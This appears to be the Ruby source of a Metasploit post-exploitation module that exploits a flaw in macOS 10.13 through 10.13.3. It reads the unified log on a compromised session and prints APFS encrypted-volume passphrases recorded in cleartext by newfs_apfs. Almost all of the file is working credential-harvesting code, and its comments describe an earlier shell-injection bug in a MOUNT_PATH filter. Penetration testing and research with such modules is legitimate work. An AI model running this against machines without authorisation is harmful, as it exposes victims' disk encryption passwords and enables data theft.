GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/osx/gather/apfs_encrypted_volume_passwd.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
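class MetasploitModule < Msf::Post
  # `sw_vers -productVersion` prints "10.13" for the .0 release and "10.13.N"
  # for point releases. The original pattern, /^10\.13[.[0-3]]?$/, used a
  # nested character class that allowed only ONE optional trailing character,
  # so "10.13.1".."10.13.3" were reported Safe and only "10.13" matched.
  # Anchored with \A/\z so a partial match inside a longer string cannot pass.
  VULNERABLE_VERSION = /\A10\.13(\.[0-3])?\z/

  # A newfs_apfs invocation recorded in the unified log; on affected versions
  # the passphrase supplied via the -S flag is logged in cleartext.
  NEWFS_APFS_PASSWORD = /newfs_apfs(.*)-S(.*)$/

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Mac OS X APFS Encrypted Volume Password Disclosure',
        'Description' => %q{
          This module exploits a flaw in OSX 10.13 through 10.13.3
          that discloses the passwords of encrypted APFS volumes.

          In OSX a normal user can use the 'log' command to view the system
          logs. In OSX 10.13 to 10.13.2 when a user creates an encrypted APFS
          volume the password is visible in plaintext within these logs.
        },
        'License' => MSF_LICENSE,
        'References' => [
          [ 'URL', 'https://thehackernews.com/2018/03/macos-apfs-password.html' ],
          [ 'URL', 'https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp' ]
        ],
        'Platform' => 'osx',
        'Arch' => ARCH_ALL,
        'Author' => [
          'Sarah Edwards', # earliest public discovery
          'cbrnrd' # Metasploit module
        ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'DisclosureDate' => '2018-03-21'
      )
    )
    register_options([
      # The log entries identify a volume only by its mount path (current or
      # previous), never by volume name, so that is what can be filtered on.
      OptString.new('MOUNT_PATH', [false, 'The mount path of the volume to get the password of (Leave blank for all)', ''])
    ])
  end

  # Compare the target's reported macOS version against the affected range.
  #
  # @return [Exploit::CheckCode] Vulnerable for 10.13 through 10.13.3, Safe otherwise
  def check
    osx_version = cmd_exec('sw_vers -productVersion').to_s.strip
    vprint_status("Target reports macOS version #{osx_version}")
    return Exploit::CheckCode::Vulnerable if VULNERABLE_VERSION.match?(osx_version)

    Exploit::CheckCode::Safe
  end

  # Query the unified log for newfs_* events and print any newfs_apfs command
  # line that carries a -S (passphrase) argument.
  #
  # The MOUNT_PATH filter is applied locally rather than by piping through
  # `grep` on the target: the previous implementation interpolated the
  # datastore value unquoted into the shell command, so a path containing
  # spaces or shell metacharacters broke the pipeline (or executed something
  # other than intended).
  #
  # @return [void]
  def run
    if check == Exploit::CheckCode::Safe
      print_error('This version of OSX is not vulnerable')
      return
    end

    cmd = "log show --info --predicate 'eventMessage contains \"newfs_\"'"
    vprint_status("Running \"#{cmd}\" on target...")
    results = cmd_exec(cmd).to_s
    vprint_status("Target results:\n#{results}")

    if results.empty?
      print_error('Got no response from target. Stopping...')
      return
    end

    mount_path = datastore['MOUNT_PATH'].to_s
    log_lines = results.lines
    # Plain substring match: the operator supplies a path, not a regex.
    log_lines = log_lines.select { |line| line.include?(mount_path) } unless mount_path.empty?

    successful_lines = 0
    log_lines.each do |line|
      match = NEWFS_APFS_PASSWORD.match(line)
      next unless match

      # The whole matched command line is reported; the -S value is the
      # passphrase but the remainder may also carry device arguments.
      print_good("APFS command found: #{match[0]}")
      successful_lines += 1
    end

    print_error('No password(s) found for any volumes. Exiting...') if successful_lines.zero?
  end
end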